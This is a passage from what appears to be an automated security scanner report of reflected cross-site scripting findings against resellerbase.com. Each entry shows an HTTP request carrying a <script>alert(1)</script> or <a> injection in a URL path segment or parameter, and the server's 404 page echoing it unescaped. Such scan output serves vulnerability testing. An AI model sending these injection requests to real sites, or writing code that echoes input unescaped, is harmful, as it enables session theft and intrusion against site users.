<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos8af4c<script>alert(1)</script>68964381781/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.246. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7ed98<script>alert(1)</script>b768a2b51c7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images7ed98<script>alert(1)</script>b768a2b51c7/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images7ed98<script>alert(1)</script>b768a2b51c7/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.247. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8bdc9<script>alert(1)</script>23cdfb53eea was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating8bdc9<script>alert(1)</script>23cdfb53eea/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating8bdc9<script>alert(1)</script>23cdfb53eea/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.248. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload a5792<script>alert(1)</script>529f76e6fc1 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/search.phpa5792<script>alert(1)</script>529f76e6fc1?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/search.phpa5792<script>alert(1)</script>529f76e6fc1?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.249. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 2161d<a>34cbda975c2 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search2161d<a>34cbda975c2&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search2161d<a>34cbda975c2&opt=2 was not found on this server.</p>
...[SNIP]...

2.250. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 770cb<a>99e15a7902e was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...770cb<a>99e15a7902e&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...770cb<a>99e15a7902e&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.251. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6ea34<script>alert(1)</script>f7af7ff18fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&6ea34<script>alert(1)</script>f7af7ff18fa=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&6ea34<script>alert(1)</script>f7af7ff18fa=1 was not found on this server.</p>
...[SNIP]...

2.252. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d294d<a>ec3cbe13d67 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d294d<a>ec3cbe13d67 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d294d<a>ec3cbe13d67 was not found on this server.</p>
...[SNIP]...

2.253. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ff9cf<script>alert(1)</script>cc07335c40d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultff9cf<script>alert(1)</script>cc07335c40d/personals-dating/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultff9cf<script>alert(1)</script>cc07335c40d/personals-dating/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.254. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fd164<script>alert(1)</script>b5a17f9d9c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-datingfd164<script>alert(1)</script>b5a17f9d9c2/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-datingfd164<script>alert(1)</script>b5a17f9d9c2/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.255. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c4384<script>alert(1)</script>25ec5527d1b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themesc4384<script>alert(1)</script>25ec5527d1b/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themesc4384<script>alert(1)</script>25ec5527d1b/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.256. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 97bef<script>alert(1)</script>a2a6267faa9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos97bef<script>alert(1)</script>a2a6267faa9/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos97bef<script>alert(1)</script>a2a6267faa9/images/review/ was not found on this server.</p>
...[SNIP]...

2.257. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fd8e6<script>alert(1)</script>f9a9dda122e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/imagesfd8e6<script>alert(1)</script>f9a9dda122e/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/imagesfd8e6<script>alert(1)</script>f9a9dda122e/review/ was not found on this server.</p>
...[SNIP]...

2.258. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f25ba<script>alert(1)</script>16db7c16bc6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/reviewf25ba<script>alert(1)</script>16db7c16bc6/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/reviewf25ba<script>alert(1)</script>16db7c16bc6/ was not found on this server.</p>
...[SNIP]...

2.259. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d06d5<script>alert(1)</script>968b538ec1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/review/?d06d5<script>alert(1)</script>968b538ec1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review/?d06d5<script>alert(1)</script>968b538ec1=1 was not found on this server.</p>
...[SNIP]...

2.260. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 34019<script>alert(1)</script>a32761d78db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult34019<script>alert(1)</script>a32761d78db/personals-dating/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult34019<script>alert(1)</script>a32761d78db/personals-dating/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.261. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cb958<script>alert(1)</script>b7e035dd44b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-datingcb958<script>alert(1)</script>b7e035dd44b/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-datingcb958<script>alert(1)</script>b7e035dd44b/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.262. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e258f<script>alert(1)</script>8a49e814fe0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themese258f<script>alert(1)</script>8a49e814fe0/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themese258f<script>alert(1)</script>8a49e814fe0/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.263. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f5c1<script>alert(1)</script>8f8f057f782 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos6f5c1<script>alert(1)</script>8f8f057f782/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos6f5c1<script>alert(1)</script>8f8f057f782/images/review/0.gif was not found on this server.</p>
...[SNIP]...

